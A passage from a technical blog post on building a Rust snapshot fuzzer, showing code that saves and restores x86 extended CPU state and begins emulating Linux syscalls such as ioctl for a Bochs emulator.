<span class="k">fn</span> <span class="nf">lucid_handler</span><span class="p">(</span><span class="n">context</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">,</span> <span class="n">exit_reason</span><span class="p">:</span> <span class="nb">i32</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// We have to make sure this bad boy isn't NULL </span>
    <span class="k">if</span> <span class="n">context</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"LucidContext pointer was NULL"</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>

    <span class="c1">// Ensure that we have our magic value intact, if this is wrong, then we </span>
    <span class="c1">// are in some kind of really bad state and just need to die</span>
    <span class="k">let</span> <span class="n">magic</span> <span class="o">=</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">ptr_to_magic</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
    <span class="k">if</span> <span class="n">magic</span> <span class="o">!=</span> <span class="n">CTX_MAGIC</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid LucidContext Magic value: 0x{:X}"</span><span class="p">,</span> <span class="n">magic</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>

    <span class="c1">// Before we do anything else, save the extended state</span>
    <span class="k">let</span> <span class="n">save_inst</span> <span class="o">=</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">ptr_to_save_inst</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
    <span class="k">if</span> <span class="n">save_inst</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid Save Instruction"</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="k">let</span> <span class="n">save_inst</span> <span class="o">=</span> <span class="n">save_inst</span><span class="nf">.unwrap</span><span class="p">();</span>

    <span class="c1">// Get the save area</span>
    <span class="k">let</span> <span class="n">save_area</span> <span class="o">=</span>
        <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">ptr_to_save_area</span><span class="p">(</span><span class="n">context</span><span class="p">,</span> <span class="nn">SaveDirection</span><span class="p">::</span><span class="n">FromBochs</span><span class="p">);</span>

    <span class="k">if</span> <span class="n">save_area</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">||</span> <span class="n">save_area</span> <span class="o">%</span> <span class="mi">64</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid Save Area"</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>

    <span class="c1">// Determine save logic</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our save mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

            <span class="c1">// Call xsave to save the extended state to Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xsave64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxsave to save the extended state to Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxsave64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>

    <span class="c1">// Try to convert the exit reason into BochsExit</span>
    <span class="k">let</span> <span class="n">exit_reason</span> <span class="o">=</span> <span class="nn">BochsExit</span><span class="p">::</span><span class="nf">try_from</span><span class="p">(</span><span class="n">exit_reason</span><span class="p">);</span>
    <span class="k">if</span> <span class="n">exit_reason</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid Bochs Exit Reason"</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="k">let</span> <span class="n">exit_reason</span> <span class="o">=</span> <span class="n">exit_reason</span><span class="nf">.unwrap</span><span class="p">();</span>
    
    <span class="c1">// Determine what to do based on the exit reason</span>
    <span class="k">match</span> <span class="n">exit_reason</span> <span class="p">{</span>
        <span class="nn">BochsExit</span><span class="p">::</span><span class="n">Syscall</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="nf">syscall_handler</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
        <span class="p">},</span>
    <span class="p">}</span>

    <span class="c1">// Restore extended state, determine restore logic</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our restore mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

            <span class="c1">// Call xrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>There are a few important pieces here to discuss.</p>

<h2 id="extended-state">Extended State</h2>
<p>Let’s start with this concept of the save area. What is that? Well, we already have the general-purpose registers and the CPU flags saved, but there is also what’s called the “extended state” of the processor that we haven’t saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other stuff like control and status registers such as MXCSR. Is this important? It’s hard to say, we don’t know wtf Bochs will do. It might count on these being preserved across function calls, so I thought we’d go ahead and do it.</p>

<p>To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I query the processor for two saving instructions to see if they’re available. If neither is, we fall back to not saving anything, since for now we don’t support anything else. So when we create the execution context initially, we determine which save instruction we’ll need and store that answer in the execution context. Then on a context switch, we can dynamically use the appropriate extended state saving function. This works because we don’t use any of the extended state in <code class="language-plaintext highlighter-rouge">lucid_handler</code> before the save, so it’s still intact. You can see how I checked during context initialization here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">fn</span> <span class="nf">new</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Check which save features are supported, checking from most </span>
        <span class="c1">// advanced to least</span>
        <span class="k">let</span> <span class="n">save_inst</span> <span class="o">=</span> <span class="k">if</span> <span class="nn">std</span><span class="p">::</span><span class="nd">is_x86_feature_detected!</span><span class="p">(</span><span class="s">"xsave"</span><span class="p">)</span> <span class="p">{</span>
            <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span>
        <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="nn">std</span><span class="p">::</span><span class="nd">is_x86_feature_detected!</span><span class="p">(</span><span class="s">"fxsr"</span><span class="p">)</span> <span class="p">{</span>
            <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="nn">SaveInst</span><span class="p">::</span><span class="n">NoSave</span>
        <span class="p">};</span>

        <span class="c1">// Get save area size</span>
        <span class="k">let</span> <span class="n">save_size</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
            <span class="nn">SaveInst</span><span class="p">::</span><span class="n">NoSave</span> <span class="k">=&gt;</span> <span class="mi">0</span><span class="p">,</span>
            <span class="n">_</span> <span class="k">=&gt;</span> <span class="nf">calc_save_size</span><span class="p">(),</span>
        <span class="p">};</span>
</code></pre></div></div>
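<p>As a self-contained sketch of the same idea, the snippet below pairs the detection with the alignment each instruction needs for its save area: <code class="language-plaintext highlighter-rouge">xsave</code> requires a 64-byte aligned area and <code class="language-plaintext highlighter-rouge">fxsave</code> a 16-byte aligned one. The helper names <code class="language-plaintext highlighter-rouge">detect_save_inst</code>, <code class="language-plaintext highlighter-rouge">required_alignment</code>, and <code class="language-plaintext highlighter-rouge">save_area_ok</code> are hypothetical and not part of Lucid, and treating <code class="language-plaintext highlighter-rouge">NoSave</code> as always valid is an assumption of this sketch.</p>

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum SaveInst {
    XSave64,
    FxSave64,
    NoSave,
}

impl SaveInst {
    // Alignment the save area must have for this instruction.
    fn required_alignment(self) -> usize {
        match self {
            SaveInst::XSave64 => 64,
            SaveInst::FxSave64 => 16,
            SaveInst::NoSave => 1,
        }
    }
}

// Pick the most capable save instruction the current CPU reports.
fn detect_save_inst() -> SaveInst {
    #[cfg(target_arch = "x86_64")]
    {
        if std::is_x86_feature_detected!("xsave") {
            return SaveInst::XSave64;
        }
        if std::is_x86_feature_detected!("fxsr") {
            return SaveInst::FxSave64;
        }
    }
    SaveInst::NoSave
}

// Validate a save area address for the chosen instruction. With NoSave there
// is nothing to write, so any address (including 0) is accepted here.
fn save_area_ok(addr: usize, inst: SaveInst) -> bool {
    match inst {
        SaveInst::NoSave => true,
        _ => addr != 0 && addr % inst.required_alignment() == 0,
    }
}
```

<p>A page-aligned mapping satisfies both alignment requirements, so a single check against 64 is enough when the area always comes from a page-aligned mapping.</p>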

<p>The way this works is the processor takes a pointer to the memory where you want the state saved, plus a mask describing which specific state components you want saved. I just maxed out the amount of state I want saved and asked the CPU how much memory that would be:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Standalone function to calculate the size of the save area for saving the </span>
<span class="c1">// extended processor state based on the current processor's features. `cpuid` </span>
<span class="c1">// will return the save area size based on the value of the XCR0 when ECX==0</span>
<span class="c1">// and EAX==0xD. The value returned to EBX is based on the current features</span>
<span class="c1">// enabled in XCR0, while the value returned in ECX is the largest size it</span>
<span class="c1">// could be based on CPU capabilities. So out of an abundance of caution we use</span>
<span class="c1">// the ECX value. We have to preserve EBX or rustc gets angry at us. We are</span>
<span class="c1">// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.  </span>
<span class="k">fn</span> <span class="nf">calc_save_size</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">usize</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">save</span><span class="p">:</span> <span class="nb">usize</span><span class="p">;</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"push rbx"</span><span class="p">,</span>
            <span class="s">"mov rax, 0xD"</span><span class="p">,</span>
            <span class="s">"xor rcx, rcx"</span><span class="p">,</span>
            <span class="s">"cpuid"</span><span class="p">,</span>
            <span class="s">"pop rbx"</span><span class="p">,</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rcx"</span><span class="p">)</span> <span class="n">save</span><span class="p">,</span>    <span class="c1">// Save the max size</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rdx"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobbered by CPUID output (w eax)</span>
        <span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Round up to the nearest page size</span>
    <span class="p">(</span><span class="n">save</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">!</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
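<p>For comparison, the same query can be written without inline assembly by using the <code class="language-plaintext highlighter-rouge">__cpuid_count</code> intrinsic from <code class="language-plaintext highlighter-rouge">std::arch</code>, which takes care of <code class="language-plaintext highlighter-rouge">rbx</code> for us. This is only a sketch: the function names are made up, <code class="language-plaintext highlighter-rouge">PAGE_SIZE</code> is assumed to be 4096, and it assumes leaf <code class="language-plaintext highlighter-rouge">0xD</code> exists because <code class="language-plaintext highlighter-rouge">xsave</code> support was already detected.</p>

```rust
// Assumed page size for this sketch
const PAGE_SIZE: usize = 0x1000;

// Round a size up to the next multiple of PAGE_SIZE. This relies on
// PAGE_SIZE being a power of two.
fn round_up_to_page(size: usize) -> usize {
    (size + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}

// Query CPUID leaf 0xD, sub-leaf 0. Returns (size for the features currently
// enabled in XCR0, size for every feature the CPU supports), taken from EBX
// and ECX respectively.
#[cfg(target_arch = "x86_64")]
fn xsave_area_sizes() -> (usize, usize) {
    use std::arch::x86_64::__cpuid_count;

    // The intrinsic is an `unsafe fn` on older toolchains, so the block is
    // kept and the lint silenced for newer ones.
    #[allow(unused_unsafe)]
    let leaf = unsafe { __cpuid_count(0xD, 0) };
    (leaf.ebx as usize, leaf.ecx as usize)
}

// Page-rounded size of the largest save area this CPU could need
#[cfg(target_arch = "x86_64")]
fn calc_save_size_intrinsic() -> usize {
    let (_enabled, max) = xsave_area_sizes();
    round_up_to_page(max)
}
```

<p>Whether to prefer the intrinsic or the inline assembly is mostly a matter of taste. The intrinsic avoids having to think about which registers <code class="language-plaintext highlighter-rouge">cpuid</code> clobbers.</p>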

<p>I page align the result, map that memory during execution context initialization, and save the memory address in the execution context. Now at run time in <code class="language-plaintext highlighter-rouge">lucid_handler</code> we can save the extended state:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Determine save logic</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our save mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

            <span class="c1">// Call xsave to save the extended state to Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xsave64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxsave to save the extended state to Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxsave64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>
</code></pre></div></div>
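<p>The mask passed to <code class="language-plaintext highlighter-rouge">xsave</code> selects which state components get written. The processor only saves components whose bits are set in both the mask and XCR0, so passing XCR0 itself asks for everything that is currently enabled. To get a feel for what that covers, here is a small sketch that decodes a few well-known XCR0 bits. The table is deliberately incomplete and the function name is made up.</p>

```rust
// Names for a few well-known XCR0 state-component bits (bit index, name).
// Illustrative only, not a complete list.
const XCR0_COMPONENTS: [(u32, &str); 6] = [
    (0, "x87"),
    (1, "SSE"),
    (2, "AVX"),
    (5, "AVX-512 opmask"),
    (6, "AVX-512 ZMM_Hi256"),
    (7, "AVX-512 Hi16_ZMM"),
];

// Return the names of the known components enabled in the given XCR0 value
fn describe_xcr0(xcr0: u64) -> Vec<&'static str> {
    XCR0_COMPONENTS
        .iter()
        .filter(|(bit, _)| xcr0 & (1u64 << *bit) != 0)
        .map(|(_, name)| *name)
        .collect()
}
```

<p>For example, an XCR0 value of <code class="language-plaintext highlighter-rouge">0x7</code> means x87, SSE, and AVX state are enabled, which is a common configuration on CPUs without AVX-512.</p>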

<p>Right now, all we’re handling for exit reasons are syscalls, so we invoke our syscall handler and then restore the extended state before returning back to the <code class="language-plaintext highlighter-rouge">exit_handler</code> assembly stub:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Determine what to do based on the exit reason</span>
    <span class="k">match</span> <span class="n">exit_reason</span> <span class="p">{</span>
        <span class="nn">BochsExit</span><span class="p">::</span><span class="n">Syscall</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="nf">syscall_handler</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
        <span class="p">},</span>
    <span class="p">}</span>

    <span class="c1">// Restore extended state, determine restore logic</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our restore mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

            <span class="c1">// Call xrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Let’s see how we handle syscalls.</p>

<h2 id="implementing-syscalls">Implementing Syscalls</h2>
<p>When we run the test program normally, not under Lucid, we get the following output:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">Argument count: 1
Args:
   -./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0
</span></code></pre></div></div>

<p>And when we run it with <code class="language-plaintext highlighter-rouge">strace</code>, we can see what syscalls are made:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8)         = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base="   -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2   -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0)                           = ?
+++ exited with 0 +++
</span></code></pre></div></div>

<p>We see that the first two syscalls are involved with process creation. We don’t need to worry about those since our process is already created and loaded in memory. The other syscalls are ones we’ll need to handle, things like <code class="language-plaintext highlighter-rouge">set_tid_address</code>, <code class="language-plaintext highlighter-rouge">ioctl</code>, and <code class="language-plaintext highlighter-rouge">writev</code>. We don’t worry about <code class="language-plaintext highlighter-rouge">exit_group</code> yet, as that will be a fatal exit condition because Bochs shouldn’t exit if we’re snapshot fuzzing.</p>
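<p>Since the dispatch works on raw syscall numbers, it helps to have the x86-64 Linux numbers for the calls in the <code class="language-plaintext highlighter-rouge">strace</code> output at hand. The lookup below is a small sketch for debugging output. The function name is hypothetical, and it only covers the syscalls seen in this trace.</p>

```rust
// Map an x86-64 Linux syscall number to its name, covering only the syscalls
// that show up in the strace output for the test program.
fn syscall_name(syscall_no: u64) -> Option<&'static str> {
    match syscall_no {
        16 => Some("ioctl"),
        20 => Some("writev"),
        35 => Some("nanosleep"),
        158 => Some("arch_prctl"),
        218 => Some("set_tid_address"),
        231 => Some("exit_group"),
        _ => None,
    }
}

// Build a log line for a syscall, falling back to the raw number when the
// syscall is not in the table.
fn describe_syscall(syscall_no: u64) -> String {
    match syscall_name(syscall_no) {
        Some(name) => format!("{} (0x{:X})", name, syscall_no),
        None => format!("unknown syscall (0x{:X})", syscall_no),
    }
}
```

<p>Something like this is handy in the default arm of a dispatch <code class="language-plaintext highlighter-rouge">match</code>, so an unhandled syscall gets reported by name rather than just by number.</p>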

<p>So we can use our saved register bank information to extract the syscall number from <code class="language-plaintext highlighter-rouge">rax</code> and dispatch to the appropriate syscall function! You can see that logic here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// This is where we process Bochs making a syscall. All we need is a pointer to</span>
<span class="c1">// the execution context, and we can then access the register bank and all the</span>
<span class="c1">// peripheral structures we need</span>
<span class="nd">#[allow(unused_variables)]</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">syscall_handler</span><span class="p">(</span><span class="n">context</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Get a handle to the register bank</span>
    <span class="k">let</span> <span class="n">bank</span> <span class="o">=</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">get_register_bank</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>

    <span class="c1">// Check what the syscall number is</span>
    <span class="k">let</span> <span class="n">syscall_no</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span><span class="p">;</span>

    <span class="c1">// Get the syscall arguments</span>
    <span class="k">let</span> <span class="n">arg1</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rdi</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg2</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rsi</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg3</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rdx</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg4</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.r10</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg5</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.r8</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg6</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.r9</span><span class="p">;</span>

    <span class="k">match</span> <span class="n">syscall_no</span> <span class="p">{</span>
        <span class="c1">// ioctl</span>
        <span class="mi">0x10</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">//println!("Handling ioctl()...");</span>
            <span class="c1">// Make sure the fd is 1, that's all we handle right now?</span>
            <span class="k">if</span> <span class="n">arg1</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid `ioctl` fd: {}"</span><span class="p">,</span> <span class="n">arg1</span><span class="p">);</span>
                <span class="nf">fatal_exit</span><span class="p">();</span>
            <span class="p">}</span>

            <span class="c1">// Check the `cmd` argument</span>
            <span class="k">match</span> <span class="n">arg2</span> <span class="k">as</span> <span class="nb">u64</span> <span class="p">{</span>
                <span class="c1">// Requesting window size</span>
                <span class="nn">libc</span><span class="p">::</span><span class="n">TIOCGWINSZ</span> <span class="k">=&gt;</span> <span class="p">{</span>   
                    <span class="c1">// Arg 3 is a pointer to a struct winsize</span>
                    <span class="k">let</span> <span class="n">winsize_p</span> <span class="o">=</span> <span class="n">arg3</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="n">winsize</span><span class="p">;</span>

                    <span class="c1">// If it's NULL, return an error, we don't set errno yet</span>
                    <span class="c1">// that's a weird problem</span>
                    <span class="c1">// TODO: figure out that whole TLS issue yikes</span>
                    <span class="k">if</span> <span class="n">winsize_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                        <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="nn">usize</span><span class="p">::</span><span class="n">MAX</span><span class="p">;</span>
                        <span class="k">return</span><span class="p">;</span>
                    <span class="p">}</span>

                    <span class="c1">// Deref the raw pointer</span>
                    <span class="k">let</span> <span class="n">winsize</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="o">*</span><span class="n">winsize_p</span> <span class="p">};</span>

                    <span class="c1">// Set to some constants</span>
                    <span class="n">winsize</span><span class="py">.ws_row</span>      <span class="o">=</span> <span class="n">WS_ROW</span><span class="p">;</span>
                    <span class="n">winsize</span><span class="py">.ws_col</span>      <span class="o">=</span> <span class="n">WS_COL</span><span class="p">;</span>
                    <span class="n">winsize</span><span class="py">.ws_xpixel</span>   <span class="o">=</span> <span class="n">WS_XPIXEL</span><span class="p">;</span>
                    <span class="n">winsize</span><span class="py">.ws_ypixel</span>   <span class="o">=</span> <span class="n">WS_YPIXEL</span><span class="p">;</span>

                    <span class="c1">// Return success</span>
                    <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
                <span class="p">},</span>
                <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{</span>
                    <span class="nd">println!</span><span class="p">(</span><span class="s">"Unhandled `ioctl` argument: 0x{:X}"</span><span class="p">,</span> <span class="n">arg1</span><span class="p">);</span>
                    <span class="nf">fatal_exit</span><span class="p">();</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="p">},</span>
        <span class="c1">// writev</span>
